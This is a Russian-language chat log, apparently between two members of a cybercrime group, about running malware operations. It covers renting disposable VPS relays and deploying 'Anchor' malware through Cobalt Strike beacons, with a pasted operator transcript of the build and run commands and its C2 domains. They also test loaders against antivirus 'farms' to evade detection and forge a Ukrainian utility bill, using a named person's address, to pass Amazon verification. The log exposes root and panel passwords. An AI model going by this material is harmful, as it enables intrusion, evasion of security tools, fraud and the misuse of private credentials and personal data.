[26.07.21 09:35:07] angelo:		привет бро
[26.07.21 09:35:13] angelo:		ай нид хелп
[26.07.21 09:35:45] angelo:		регал ВПСки
[26.07.21 09:35:51] angelo:		и по трем пришло такое
[26.07.21 09:35:59] angelo:		Hi,

Your VPS bum4.bom.xyz has been suspended by Admin.

Regards,
Virtualizor
[26.07.21 09:36:02] angelo:		домен отбалды ставил
[26.07.21 09:36:09] angelo:		как так ?!
[26.07.21 09:37:45] angelo:		flaunt7.com
[26.07.21 09:38:15] angelo:		у тебя нет возможности зайти в панель посомтреть ???? блин жалко 4 впски
[26.07.21 09:39:27] angelo:		если есть время на меня дурака, а то мне нужны буду сейчас
[26.07.21 09:40:16] angelo:		flaunt7.com   jimmybona@inbox.lv   LKhdbslnhdo983h3bdlkbhkjl
[26.07.21 09:45:11] angelo:		fraud ?
[26.07.21 09:45:15] angelo:		не понял
[26.07.21 09:46:11] angelo:		они ж пустые
[26.07.21 09:46:15] angelo:		я с ними ничего не делал
[26.07.21 09:46:57] angelo:		что за говно
[26.07.21 09:47:01] angelo:		я просто их оплатил и всё
[26.07.21 09:47:03] angelo:		0_0
[26.07.21 09:49:29] angelo:		хмммм
[26.07.21 09:49:36] angelo:		новый ВПН
[26.07.21 09:49:48] angelo:		уже вот тут )))
[26.07.21 09:49:57] angelo:		но нельзя на одном ?
[26.07.21 09:50:09] angelo:		или могу пока спокойно пару денй только там
[26.07.21 09:50:12] angelo:		я регаю 4 каждый день
[26.07.21 09:51:28] angelo:		ты не помнишь на vps2day  дают автоматом ip4 ?
[26.07.21 09:51:40] angelo:		или докупать допом ?
[26.07.21 10:09:02] angelo:		бро ЕСЛИ нужно будет 1-2 хоста подсобишь?
[26.07.21 10:09:17] angelo:		буду учитсья на своих ошибках и брать с запасом, просто эти 4 был мой запас ))
[26.07.21 10:10:54] angelo:		ага
[26.07.21 10:11:10] angelo:		спс
[26.07.21 10:19:52] angelo:		и кстати регал на левый домен, чекал его, он чистый, и вот пойми как они заблочили....
[26.07.21 12:52:29] angelo:		всё, прошли проплаты, норм, хосты получил - спасибо тебе что всегда идешь на помощь как Чип и Дейл ))
[26.07.21 13:00:11] angelo:		как минимум приятно бро
[05.08.21 12:14:17] angelo:		привет будущий отдыхающий
[05.08.21 12:14:28] angelo:		как там прокладки для внц ?
[05.08.21 12:14:36] angelo:		не в курсе
[05.08.21 12:15:21] rocco:		привет, за внц к адаму
[05.08.21 12:15:28] rocco:		проклами
[30.08.21 13:41:22] angelo:		привет боксер !
[30.08.21 13:41:30] angelo:		нуна помощь
[30.08.21 13:41:37] angelo:		дедик нужен на тест модуля
[30.08.21 13:41:44] rocco:		привет
[30.08.21 13:42:12] rocco:		виндовый дедик?
[30.08.21 13:43:24] angelo:		угусь
[06.09.21 11:43:03] angelo:		привет!
[06.09.21 11:43:10] angelo:		я помню что писал
[06.09.21 11:43:12] angelo:		но всё же )
[06.09.21 11:43:18] angelo:		сборку брукс мне кинул анкора
[06.09.21 11:43:22] angelo:		теперь б
[06.09.21 11:43:28] angelo:		всё остальное узнать как поулчить
[06.09.21 11:43:57] rocco:		привет, что за сборка?
[06.09.21 11:44:01] rocco:		файлы?
[06.09.21 11:44:08] rocco:		или чего скинул?
[06.09.21 11:44:32] angelo:		да, у меня я обяьснять ) исходники анкора
[06.09.21 11:44:47] angelo:		чтобы делать билды
[06.09.21 11:44:59] angelo:		аджустер и ддлки
[06.09.21 11:51:09] rocco:		а утебя кто заказал анкор уже?
[06.09.21 12:08:06] angelo:		для клиента
[06.09.21 12:08:09] angelo:		от ДЕфа
[06.09.21 12:10:37] angelo:		tom
[06.09.21 13:01:47] angelo:		я ща у Дефа спрошу кто будет представлять клиента
[06.09.21 13:01:47] angelo:		но жопой чую что я
[06.09.21 13:04:29] rocco:		еще раз вылетал
[06.09.21 13:04:43] angelo:		это для ТОма
[06.09.21 13:04:47] angelo:		Деф говорит
[06.09.21 13:04:58] angelo:		тока я не понл кто будет представлять клиента
[06.09.21 13:33:06] rocco:		понял кому, сделаю
[07.09.21 12:10:38] angelo:		Привет, свиснишь мне тоже когда будет админка готова для тома
[07.09.21 12:11:51] rocco:		привет да
[07.09.21 16:36:43] angelo:		вопрос на миллион
[07.09.21 16:36:49] angelo:		чисто случайно нет хостов ?
[07.09.21 16:37:07] angelo:		itldc.com подвел
[07.09.21 16:46:00] rocco:		serverroom.net
[07.09.21 16:48:17] angelo:		и за сколько ты там брал ?
[07.09.21 16:48:21] angelo:		цены золотые
[07.09.21 16:48:34] angelo:		30 40 80 в месяц
[07.09.21 16:54:09] angelo:		а может будет два а ? :rolling_eyes:
[07.09.21 16:54:09] angelo:		а то оплатить то оплатил, но когда блин
[07.09.21 16:54:37] rocco:		в пределах 100
[07.09.21 16:54:41] rocco:		50-100
[07.09.21 16:54:45] angelo:		ПППЦ
[07.09.21 16:54:48] rocco:		активируют быстро
[07.09.21 16:54:58] rocco:		дешевле не найдешь
[07.09.21 16:55:09] angelo:		да они каждый день по 4 штуки едят
[07.09.21 16:55:09] angelo:		по 4 хоста
[07.09.21 17:11:23] angelo:		и ты хочешь сказать что все прокладки у нас такие золотые ?
[07.09.21 17:11:36] angelo:		сколько ж в месяц то выходит ?!?!
[07.09.21 17:25:29] rocco:		а так н апрокладки?
[07.09.21 17:25:35] rocco:		vps2day.com
[07.09.21 17:25:40] rocco:		5,frjd
[07.09.21 17:25:46] rocco:		5bakin
[07.09.21 17:25:58] rocco:		минимал н апроклу хватает
[07.09.21 17:26:04] rocco:		я думал дедик нужен
[07.09.21 17:34:55] angelo:		бро
[07.09.21 17:35:02] angelo:		точно два хаста нету ?
[07.09.21 17:35:10] angelo:		я уже две проплаты сделал
[07.09.21 17:35:16] angelo:		на двух сервисах
[07.09.21 17:35:23] angelo:		но проплата не проходит пока
[07.09.21 17:35:30] rocco:		неа сам жду проплату
[07.09.21 17:35:30] angelo:		ща бум на биток видат ьидет
[07.09.21 17:35:39] rocco:		даа
[07.09.21 17:35:49] rocco:		сижу уже 30 мин жду
[07.09.21 17:35:54] angelo:		я час
[07.09.21 17:36:01] angelo:		впс2дей все грязные
[07.09.21 17:36:07] rocco:		писец
[07.09.21 17:36:07] angelo:		уже не раз проверял
[07.09.21 17:36:32] rocco:		да заюзали уже
[07.09.21 17:36:55] rocco:		82.117.252.142
[07.09.21 17:37:03] rocco:		https://app.bitlaunch.io/login
[07.09.21 17:37:11] rocco:		вот здесь можно еще
[07.09.21 17:37:25] rocco:		https://bithost.io/
[07.09.21 17:37:37] angelo:		есть они, тоже буду юзать
[07.09.21 17:37:42] angelo:		у меня список целый от тебя )
[07.09.21 17:37:48] angelo:		и ещё кто-то мне кидал
[07.09.21 17:38:20] angelo:		тока их не юзай
[07.09.21 17:38:21] angelo:		edis.at
[07.09.21 18:10:21] angelo:		ну короче 2 часа грубо говоря и тишина
[07.09.21 18:11:15] rocco:		да и у меня суки
[07.09.21 18:11:22] rocco:		и люди ждут
[07.09.21 18:11:27] rocco:		и спать пора
[07.09.21 18:11:44] angelo:		да у меня тож тут ждут (( ппц
[07.09.21 18:12:14] rocco:		во пршли у меня
[07.09.21 18:12:52] angelo:		повезло ((
[07.09.21 18:13:32] rocco:		:sunglasses:
[07.09.21 18:13:42] rocco:		отдупляюсь
[08.09.21 08:45:37] rocco:		привет, я сделал анкор
[08.09.21 08:45:52] rocco:		ты тома сам будешь обучать как пользоватся?
[08.09.21 09:40:14] angelo:		привет бро
[08.09.21 09:40:27] angelo:		вот ты спросил конечно, а что именно ?
[08.09.21 09:40:32] angelo:		про обучать
[08.09.21 09:40:33] rocco:		я уже отдал ему
[08.09.21 09:40:41] angelo:		ну отлично
[08.09.21 09:40:45] rocco:		я щас ему объясняю
[08.09.21 09:40:50] angelo:		понял
[08.09.21 09:41:06] angelo:		скопирнешь мне сообщения как закончишь если не трудно а ?
[08.09.21 09:41:19] angelo:		чтоб не повторяться, мне б вспомнить
[08.09.21 09:51:17] rocco:		
[08.09.21 11:26:21] angelo:		если что-то ты писал то я не видел p.s. один хост вчера бабки не увидел и до сих пор держит на неоплаченно !!!!
[20.09.21 16:23:45] angelo:		привет !
[20.09.21 16:23:57] angelo:		слушай, а как там с анкором для
[20.09.21 16:24:03] angelo:		забыл как там его звать
[20.09.21 16:24:06] angelo:		что от Дефа
[20.09.21 16:27:46] angelo:		для Тома
[20.09.21 16:54:52] rocco:		так тому отдал объяснил
[20.09.21 16:55:08] rocco:		но анкор палится, ждем новую весию 2.0
[20.09.21 16:55:47] angelo:		ой
[20.09.21 16:55:51] angelo:		брукс делает ?
[20.09.21 16:55:54] angelo:		сказал по срокам ?
[20.09.21 17:03:35] rocco:		он уже с админкой тестировал, хотел сегодня узнать, но он в оффе
[20.09.21 17:23:35] angelo:		ок
[20.09.21 17:23:44] angelo:		завтра будем узнавать, у нас тут ещё один будет
[20.09.21 17:23:59] angelo:		помнишь я просил для себя сохранить твоё обьяснение ?)
[20.09.21 17:24:03] angelo:		чтоб не повторять
[20.09.21 17:24:34] rocco:		повтори
[20.09.21 17:24:47] angelo:		завтра будем узнавать, у нас тут ещё один будет
помнишь я просил для себя сохранить твоё обьяснение ?)
чтоб не повторять
[20.09.21 17:25:03] angelo:		как с анкором работать, мне б память освежить
[20.09.21 17:25:32] angelo:		вот думал ты б перекинул свои обьяснения Тома и я б разобрался что куда....
[20.09.21 17:26:29] rocco:		а я не скинул?
[20.09.21 17:26:37] angelo:		нет....
[20.09.21 17:27:48] angelo:		я всегда сохранаяю что нужно из переписок, это у меня уже традиция, не мог не сохранить
[20.09.21 17:29:33] rocco:		```
 ща сек
нет криптовать не надо, вот этот скрипт передает исходники на сетку, и собирает сам анкор файл, котрый и запускаешь
в меню кобы появится подменю zakrep
где надо нажать upload - generate - run
соотв upload грузит на бот исходник, generate собирает, run запускает
перед запуском лучше interakt на боте открыть, и будет такой вывод

[*] Tasked beacon to make directory C:\Windows\Temp\adf
[*] cd C:\Windows\Temp\adf
[*] Tasked beacon to upload C:\Users\Administrator\Desktop\zaza\zakrep\anchorAsjuster_x64.exe as anchorAsjuster_x64.exe
[*] Tasked beacon to upload C:\Users\Administrator\Desktop\zaza\zakrep\anchorDNS_x64.exe as anchorDNS_x64.exe
[+] host called home, sent: 599669 bytes
[+]  G E N E R A T E
[+]   Z A K R E P  
[*] cd C:\Windows\Temp\adf
[*] Tasked beacon to run: C:\Windows\Temp\adf\anchorAsjuster_x64.exe --source=anchorDNS_x64.exe --target=anchor_x64.exe --domain=gmrxmoeyu.com,cjsljgjaq.com  --period=2 --lasthope=2 -guid
[+] host called home, sent: 219 bytes
[+] received output:
target file "anchor_x64.exe"
source file size 347648
guid: 5F9E91A80E6289488CADA4FAEA38E168, shift 0x00053C00(343040)
domain: shift 0x00053A04(342532)
OK

[+]  R U N
[+]   Z A K R E P  
[*] cd C:\Windows\Temp\adf
[*] Tasked beacon to run: C:\Windows\Temp\adf\anchor_x64.exe
[+] host called home, sent: 92 bytes

если защита не заблокирует, вот такая картинка будет, через пару минут, сетка должн ав админке появится

9:42 AM
ща ждем, должна в админку прийти
вот пришла
смотри дальше как подниать из закрепа
щелкаешь на глаз рядом с сеткой
9:43 AM
я 2 на всякий случай
запусти
запустил
9:43 AM
вот щелкни на глаз на пришедшей
там выскочить окно с кнопкой new comand
9:44 AM
ага нажал
9:44 AM
как ее нажмешь попадешь в меню какие файлы или команды отправлять
если dll, нажимаешь по ссылке из интернета
в params пишешь точку например StartW
в url ссылку на файл, просто ссылку, http://1.2.3.4/file.dll
и create нажимаешь
в кобу не сразу приходит

```
[20.09.21 17:30:16] rocco:		вот который скрипт для кобы я уже делаю, конкретно под те домены которые в закрепе
[20.09.21 17:31:09] rocco:		про админку это я про длл объяснял
[20.09.21 17:31:45] rocco:		можно также выбрать exe отправить, также или ссылка или с со своего компа загружаешь
[20.09.21 17:32:15] rocco:		и там 2 пункта, с записью на диск и без записи, я выбираю всегда без записи
[20.09.21 17:35:05] angelo:		ок
[20.09.21 17:35:08] angelo:		спасибо друг !
[20.09.21 17:35:39] rocco:		если что скрипт для кобы у меня берут
[20.09.21 17:35:59] angelo:		коба для меня это ещё что-то не изведанное
[20.09.21 17:36:03] angelo:		никогда с ним не связывался
[20.09.21 17:36:07] angelo:		но буду иметь ввид
[20.09.21 17:36:17] rocco:		ну те кто анкор закажут, должны знать
[20.09.21 17:36:27] angelo:		окай
[20.09.21 17:36:54] rocco:		просто это очень удобный скрипт, ничего вручную не надо делать
[20.09.21 17:36:56] angelo:		им он для стиллера как я понял
[20.09.21 17:37:17] angelo:		а много чего надо в ручную деалть ?
[20.09.21 17:37:20] angelo:		забей
[20.09.21 17:37:23] angelo:		не говори
[20.09.21 17:37:27] rocco:		нет ваще не надо
[20.09.21 17:37:32] angelo:		всё равно не пойму я ж с кобой не работал
[20.09.21 17:37:39] angelo:		ок, принял тебя
[22.09.21 10:06:41] angelo:		привет бро !
[22.09.21 10:06:52] angelo:		слушай там ферма с Тренд Микро не обновляется
[22.09.21 10:07:00] angelo:		пишет обратится к админу
[22.09.21 10:14:17] rocco:		привет напиши деметрусу
[22.09.21 10:14:44] angelo:		Димка молчит, понял ждем
[23.09.21 15:20:27] angelo:		привет !
[23.09.21 15:20:32] angelo:		чтож делать нам ?
[23.09.21 15:20:40] angelo:		нам надо лоадер прокручить через ТрендМикро (
[23.09.21 15:24:34] rocco:		привет, а деметрус не решил чтоли?
[23.09.21 15:25:29] angelo:		не-а
[23.09.21 15:25:37] angelo:		ща проверю но думаю что нет
[23.09.21 15:37:19] angelo:		не-а, снапшот трехнедельной давности (
[23.09.21 15:37:33] angelo:		а разраб ждет когда я прокручу через ТрендМикро его лоадер
[23.09.21 15:42:28] rocco:		а что с ним? лицензия кончилась?
[23.09.21 15:42:35] angelo:		ага
[23.09.21 15:42:38] angelo:		не дает обновиться
[23.09.21 15:42:43] angelo:		патерны старые
[23.09.21 15:42:57] angelo:		и говоришь пиши админу юзер ты криворукий и ничего не трогай
[23.09.21 15:43:25] rocco:		ща смотрю
[23.09.21 15:45:55] rocco:		забыл какой пасс на вход?
[23.09.21 15:46:08] angelo:		помню
[23.09.21 15:46:19] angelo:		JohnJackson21
[23.09.21 15:46:28] rocco:		точно
[23.09.21 15:49:53] rocco:		там с впн проблемы
[23.09.21 15:49:59] rocco:		а кто ставил, деметрус?
[23.09.21 15:50:10] angelo:		вот ты спросил
[23.09.21 15:50:17] angelo:		не знаю бро
[23.09.21 15:50:25] rocco:		щас
[23.09.21 15:53:32] rocco:		там походу везде впны сдохли
[23.09.21 15:53:57] angelo:		ну на симантике обнова прошла
[23.09.21 15:54:28] rocco:		ага ща оттуда возьму тогда
[23.09.21 16:43:23] rocco:		проверь, там оплатили впны
[23.09.21 16:43:30] rocco:		наверно уже активный
[23.09.21 16:44:14] angelo:		понял спасибо !
[23.09.21 16:48:40] rocco:		перезагрузи лучше
[23.09.21 16:48:57] angelo:		да я тут пока другое решаю
[23.09.21 16:49:02] angelo:		тут Деф активный стал
[23.09.21 16:49:08] angelo:		а значит мыло в жопе
[28.09.21 14:03:20] angelo:		Привет !
[28.09.21 14:03:23] angelo:		я снова к тебе
[28.09.21 14:03:37] angelo:		снова нет инета на МикроТренде
[28.09.21 14:03:47] angelo:		починить бы
[28.09.21 14:03:59] angelo:		:pensive:
[28.09.21 14:03:59] rocco:		привет
[28.09.21 14:04:13] rocco:		там помоему гатор разбирался, ща напишу ему
[28.09.21 14:04:25] angelo:		окай
[28.09.21 15:01:33] rocco:		бро ты в жабе азот?
[28.09.21 15:01:46] angelo:		ага
[28.09.21 15:01:51] angelo:		ну хоть кто-то помнит
[28.09.21 15:01:53] rocco:		значит к тебе
[28.09.21 15:02:09] rocco:		у тебя сказали есть хороший отрисовщик?
[28.09.21 15:02:30] angelo:		есть такой
[28.09.21 15:03:05] angelo:		но важный нюанс что отрисовывать
[28.09.21 15:03:10] rocco:		можешь с ним связатся, поцене и тд., мне нужен телефонный счет
[28.09.21 15:03:10] rocco:		для верифкации
[28.09.21 15:03:20] rocco:		фамилия и адрес
[28.09.21 15:03:28] rocco:		киевский счет телефонный
[28.09.21 15:03:46] rocco:		любой я думаю подойдет
[28.09.21 15:04:10] rocco:		хочу посмотреть проканет для амазона
[28.09.21 15:04:33] angelo:		вот ты написал конечно - хоть скинь пример )
[28.09.21 15:04:39] angelo:		а то честно не понял ТЗ
[28.09.21 15:05:00] rocco:		ща найду
[28.09.21 15:17:25] rocco:		может типа такого чтонибудь
[28.09.21 15:18:01] angelo:		какого
[28.09.21 15:24:31] rocco:		ща
[28.09.21 17:00:21] angelo:		если что пиши бро я тут
[28.09.21 17:06:06] rocco:		да, просто ищу чтонибудь подхъодящее
[28.09.21 20:05:17] rocco:		https://docs.google.com/document/d/1R_rA2Ue3AVqbhbtsGEJKCq-8suFHsA2fCfd9Z7gZOXo/edit
[28.09.21 20:19:04] angelo:		слушай, ну надо найти хорошего качества боле енее с чего делать
[28.09.21 20:19:14] angelo:		давай завтра попробуем чего нибубудь придумать
[28.09.21 20:19:21] angelo:		и может получиться
[29.09.21 09:05:42] rocco:		бро привет, а твой отрисовщик может поискать бланк любой укр киев, телефонный счет или счет за энергию, главное чтобы видно было что фио и адрес?
[29.09.21 09:06:10] angelo:		блин, слушай ну вопрос сложный так как в глаза такого не видели
[29.09.21 09:06:13] angelo:		поищем
[29.09.21 09:06:17] angelo:		а адрсе ?
[29.09.21 09:06:24] angelo:		адрес
[29.09.21 09:06:27] rocco:		ща скину
[29.09.21 09:07:07] rocco:		мне просто интересно прокатит или нет
[29.09.21 09:07:17] angelo:		в таким вещах всегда есть нюанс - кваитанции меняются, ну понимаешь в том году была такая, в следующем добавили херню мелкую какую нибудь
[29.09.21 09:07:18] rocco:		решило бы проблему конечно
[29.09.21 09:07:30] angelo:		ой бля
[29.09.21 09:07:32] rocco:		да откуда они там знают на амазоне
[29.09.21 09:08:01] angelo:		норм
[29.09.21 09:08:01] angelo:		сделаю сегодня
[29.09.21 09:08:16] angelo:		я ща как раз анкор буду тестить
[29.09.21 09:11:30] rocco:		```
st.Rakhmaninova,55, apartment 2, Kyiv, Kyiv 03164 UA
Roman Sorochenko 
+380685874921
```
[29.09.21 09:11:43] rocco:		ага да вроде с бруксом доделали
[29.09.21 09:12:05] angelo:		ну вот мне нужно протестить и по ферме потом прокатить
[29.09.21 09:12:21] rocco:		гуд збс
[29.09.21 09:12:29] rocco:		а то все ждут
[29.09.21 09:12:46] angelo:		ну я тока получил
[29.09.21 09:12:47] rocco:		з адень протестишь?
[29.09.21 09:12:53] angelo:		угу
[29.09.21 09:13:02] rocco:		ок ждем
[29.09.21 11:59:42] angelo:		а там починили фермы то ?
[29.09.21 11:59:51] angelo:		я скоро буду тестить анкор
[29.09.21 12:01:43] rocco:		а я не знаю должны были
[29.09.21 12:05:53] angelo:		будет время
[29.09.21 12:05:59] angelo:		посмотри щё счет какой нибудь
[29.09.21 12:06:06] angelo:		в нормальном качестве \более менее
[29.09.21 12:06:12] angelo:		чет найти не можем
[29.09.21 12:06:46] angelo:		есть херового качеста а надо как понимаю где четко будет виден адрес и ФИО
[29.09.21 12:10:56] rocco:		ок
[29.09.21 12:11:16] angelo:		заипался искать )
[29.09.21 12:25:05] angelo:		может такую только добавить ФИО и год заменить и адрес
[29.09.21 12:25:05] angelo:		я хз
[29.09.21 12:25:05] angelo:		https://img4.1sell.com.ua/V/Image/Blog/Picture/28/2018-09-18-6642%D1%81.jpg
[29.09.21 12:27:03] rocco:		во норм
[29.09.21 12:27:18] angelo:		ок - пошаманим
[29.09.21 12:48:23] angelo:		так
[29.09.21 12:48:25] angelo:		ты мне написал то на инглише
[29.09.21 12:48:27] angelo:		))
[29.09.21 12:48:39] angelo:		а квитанция то должна наверно на украинском писаться не ?
[29.09.21 12:48:47] angelo:		могу и английский написать
[29.09.21 12:49:01] angelo:		блин подготовил квитанцию а внимание не обратил
[29.09.21 12:49:18] angelo:		надо было почтовую тогда искать квитанцию
[29.09.21 12:49:30] angelo:		как в России пишут там по английски и номер телефона
[29.09.21 12:50:19] rocco:		я думаю можно на укр
[29.09.21 12:50:30] angelo:		АРАРАРАРАРРАРА)
[29.09.21 13:07:28] angelo:		HB>sugd2.ublnksdfsdg
[29.09.21 13:07:33] angelo:		https://send.exploit.in/download/4a6d9683b737bc0e/#xtmLtlLKwT8NoBPqt_nB8g
[29.09.21 13:07:43] angelo:		грубовато конечно
[29.09.21 13:12:38] rocco:		видно конечно
[29.09.21 13:12:46] rocco:		не прокатит я думаю
[29.09.21 13:13:07] rocco:		получается все расплывчатые, а фио и адрес четкие
[29.09.21 13:17:34] angelo:		это как пример
[29.09.21 13:17:41] angelo:		вцелом норм ?
[29.09.21 13:17:47] angelo:		там все даты поменяли
[29.09.21 13:17:52] angelo:		они были 2018
[29.09.21 13:17:53] rocco:		аа ну да конечно
[29.09.21 13:18:02] rocco:		даты не заметил
[29.09.21 13:18:15] rocco:		а так да пойдет
[29.09.21 13:20:35] angelo:		ну это уже штрихи
[29.09.21 13:20:47] angelo:		у меня почему то бот в оффе анкора это нормально ?
[29.09.21 13:20:58] angelo:		в курсе ?
[29.09.21 13:21:08] rocco:		новый?
[29.09.21 13:21:13] angelo:		ага
[29.09.21 13:21:22] angelo:		я ща запущу ещё на другой тачке
[29.09.21 13:21:26] angelo:		сделаю другой билд
[29.09.21 13:21:58] rocco:		возможно он стучит так хз
[29.09.21 13:22:13] rocco:		надо брукса пытать
[29.09.21 13:22:22] angelo:		я бы с радостью но он в офе
[29.09.21 13:22:31] angelo:		лан, перебилдую и перезапущу на новой
[29.09.21 13:58:29] angelo:		KJGHLSuild8y28oghil/sfs
[29.09.21 13:58:38] angelo:		https://send.exploit.in/download/91cca961c64ae791/#VGCjro_m00ndYTh107NNzw
[29.09.21 13:58:43] angelo:		адрес посмотри
[29.09.21 14:01:13] angelo:		и давай без придирок, это бумага, она чуть мноться и меняет траекторию всех букв
[29.09.21 14:03:48] angelo:		если так норм то нарисуем Фамилию и имя
[29.09.21 14:04:35] rocco:		ща гляну
[29.09.21 14:05:11] rocco:		во адрес норм
[29.09.21 14:05:22] angelo:		ок
[29.09.21 14:05:24] angelo:		принял
[29.09.21 14:29:27] angelo:		nmnmbuvwbl/ndadzc@@Ewddscc45
[29.09.21 14:29:50] rocco:		бро я что должен?
[29.09.21 14:30:08] angelo:		https://send.exploit.in/download/a95cbe2ab3dc0ce2/#BxPuCdv8wcKCiCqoq-uAeg
[29.09.21 14:30:15] angelo:		вот что )
[29.09.21 14:30:17] angelo:		смотри
[29.09.21 14:30:21] angelo:		вроде всё чисто
[29.09.21 14:31:00] rocco:		ща зашлю, там срок до 30, посмотрим прокатит нет
[29.09.21 14:31:32] rocco:		эбс качественно
[29.09.21 14:31:56] angelo:		бля по букве собирали пазл  )
[29.09.21 14:32:30] rocco:		знаю да
[29.09.21 14:32:36] rocco:		сколько должен?
[29.09.21 14:39:16] angelo:		не знаю
[29.09.21 14:39:19] angelo:		наверно нисколько
[29.09.21 14:39:46] angelo:		я зелый бро как авокадо )
[29.09.21 14:44:57] rocco:		ага спс
[29.09.21 16:38:34] angelo:		закинуть файл на тест через фермы через кого лучше ?
[29.09.21 16:39:06] angelo:		чтоб мне не заливать каждый раз на каждую машину а то помру от скуки
[29.09.21 16:40:04] rocco:		в  смысле каждый раз, там же можно на все одновременно
[29.09.21 16:41:53] angelo:		это как ?
[29.09.21 16:42:35] rocco:		ты же хочешь анкор прогнать?
[29.09.21 16:42:41] angelo:		ага
[29.09.21 16:43:08] rocco:		попроси мануеля он запустит
[29.09.21 16:43:37] rocco:		он мастер кунг-фу криптопанели
[29.09.21 16:43:55] angelo:		хмммм
[29.09.21 16:43:56] angelo:		окай
[29.09.21 16:45:43] angelo:		так
[29.09.21 16:45:45] angelo:		скажи
[29.09.21 16:46:08] angelo:		я обычно открываю тачку
[29.09.21 16:46:25] angelo:		и сам заливал файл и сам же руками запускал через cmd
[29.09.21 16:46:33] angelo:		или тут автотестом можно ?
[29.09.21 16:46:57] rocco:		конечно уже давно автотестом, помоему даже длл можно на динамику запускать
[29.09.21 16:47:20] rocco:		и тебе репорт обратно малварь иль чисто
[29.09.21 16:47:34] angelo:		вот же блин говно такое
[29.09.21 16:47:36] angelo:		и ведь никто не сказал
[29.09.21 16:47:42] rocco:		а ты не пользовался разве?
[29.09.21 16:47:53] angelo:		руками только
[29.09.21 16:47:59] angelo:		Мануэль говорит низя длл
[29.09.21 16:48:02] angelo:		только окзе
[29.09.21 16:48:14] rocco:		не уже давно автотест, сам прилалгалл руку и ногу
[29.09.21 16:48:25] rocco:		значит не доделали
[29.09.21 16:48:30] rocco:		блин
[29.09.21 16:48:39] rocco:		2 месяца делают
[29.09.21 16:48:49] rocco:		надо узнать у деметруса
[29.09.21 16:49:11] rocco:		н уекзешник прогони
[29.09.21 16:49:28] rocco:		поидее ваще не должен пикнуть никто
[29.09.21 16:49:47] angelo:		если автотестом можно то замечательно
[29.09.21 16:49:53] angelo:		ибо времени руками убивает уйма
[29.09.21 17:28:01] angelo:		слушай
[29.09.21 17:28:06] angelo:		я чет с анкором туплю
[29.09.21 17:28:13] angelo:		сейчас интересное было
[29.09.21 17:28:44] angelo:		у меня не отработали команды...было три, я две удалил, перезапускаю анкор на ВМ и снова появляется удаленная команда(одна из вух)
[29.09.21 17:28:57] angelo:		вот те раз
[29.09.21 17:29:00] angelo:		это нормально 7
[29.09.21 17:29:01] angelo:		?
[29.09.21 17:30:52] angelo:		и удалилась сама только что
[30.09.21 11:47:34] angelo:		привет
[30.09.21 11:47:41] angelo:		давай повторим
[30.09.21 11:47:51] angelo:		как же мне все таки ддлку на ферме запустить ?
[30.09.21 11:47:57] angelo:		на всех сразу
[30.09.21 15:48:08] angelo:		выручай
[30.09.21 15:48:14] angelo:		есть пара хостов на прокладки ?
[30.09.21 15:55:36] angelo:		горит бро
[30.09.21 16:00:46] rocco:		ща
[30.09.21 16:02:13] rocco:		```
root 94.140.112.121 XjCxhc7PjcQTyr4 LV
root 185.99.133.36 HhO2Hcy1t.@96R New Zealand
```
[30.09.21 16:04:12] angelo:		новозеландий грязный ((
[30.09.21 16:04:27] angelo:		Латвию взял
[30.09.21 16:04:35] angelo:		нету друго а ?
[30.09.21 16:04:38] angelo:		один мало
[30.09.21 16:07:19] rocco:		root 5.181.80.115 34fhjdgEN3rE5ff USA
[30.09.21 16:07:35] rocco:		попробуй этот, если что снеси там нжинкс если стоит
[30.09.21 16:08:05] angelo:		а ты юзал их ?
[30.09.21 16:11:05] rocco:		да я сегодн явзял для тестов
[30.09.21 16:11:12] angelo:		слушай
[30.09.21 16:11:12] rocco:		эти помему не юзал
[30.09.21 16:11:15] angelo:		пришла оплата
[30.09.21 16:11:19] angelo:		пока оставь себе
[30.09.21 16:11:30] angelo:		)))
[30.09.21 16:11:36] angelo:		но спасибо все равно )
[30.09.21 16:11:57] angelo:		ща проверим, а то порой хосты дохлые почему то, не заходит
[01.10.21 12:27:25] angelo:		привет !
[01.10.21 12:27:35] angelo:		testBurden_x64.exe --file=c:\\testBurden\\testEXE.txt
[01.10.21 12:27:40] angelo:		правильно нагрузку сделал ?
[01.10.21 12:27:49] angelo:		команду
[01.10.21 12:28:26] rocco:		привет, выглядит правильно
[01.10.21 12:34:47] angelo:		будет время расскажи про фермы
[01.10.21 12:34:49] angelo:		надо сегодня сделать
[01.10.21 12:35:03] angelo:		я пока отлучусь, обед сам себе не приготовит
[01.10.21 12:35:12] rocco:		так спроси мануеля
[01.10.21 12:35:25] angelo:		он не знает сказал что можно длл
[01.10.21 12:35:35] rocco:		ща я узнаю
[01.10.21 12:35:43] angelo:		спасибо
[01.10.21 15:30:52] angelo:		ты можешь посомтреть бота анкора
[01.10.21 15:31:04] angelo:		почему блин команды не отрабатывает
[01.10.21 15:31:47] rocco:		не бро пока немогу, я сбэкапом воюю
[01.10.21 15:32:10] angelo:		окай
[01.10.21 15:32:15] angelo:		бекап штука важная
[26.10.21 08:32:17] angelo:		привет боец
[26.10.21 08:35:47] rocco:		привет
[26.10.21 08:37:17] angelo:		у нас там никаких изменений в фермами ав нет  ?
[26.10.21 08:37:35] angelo:		и ещё раз спрошу, ддку значит можно в автоматическом режиме проверять ?
[26.10.21 08:40:36] rocco:		лучше по ферма у деметруса спрашивать, там переносили все
[26.10.21 08:40:52] angelo:		спс боксер
[26.10.21 08:41:03] angelo:		)
[26.10.21 17:30:45] angelo:		адрес ферм прежний ?
[26.10.21 18:48:29] angelo:		тук тук
[10.11.21 14:15:26] rocco:		анж привет
[10.11.21 14:15:41] rocco:		ты когда анкор тестил, ящики где регал?
[10.11.21 14:16:37] angelo:		приветище
[10.11.21 14:17:03] angelo:		брал у Брукса, а так можно взять у live.com
[10.11.21 14:17:15] angelo:		там дает регать без привязки
[10.11.21 14:17:15] rocco:		ага понял
[10.11.21 14:17:18] angelo:		точно говорю
[10.11.21 14:17:22] angelo:		каждый день там регаю
[10.11.21 14:17:26] rocco:		спс
[10.11.21 15:41:04] angelo:		слух
[10.11.21 15:41:14] angelo:		как проверять работоспособность прокладок а ?
[10.11.21 15:41:20] angelo:		внц падла не работает
[10.11.21 15:42:25] rocco:		он на внц делает
[10.11.21 15:42:25] rocco:		спроси у адама по проклдкам
[10.11.21 15:42:36] rocco:		серв работает
[11.11.21 08:08:48] rocco:		бро привет
[11.11.21 08:09:10] angelo:		привет
[11.11.21 08:09:19] angelo:		уот ду ю нид
[11.11.21 08:09:24] rocco:		собираю анкор новый нихера не стучит
[11.11.21 08:09:37] angelo:		а какой именно ?
[11.11.21 08:09:39] rocco:		сделал ящики на outlook
[11.11.21 08:09:44] rocco:		live.com
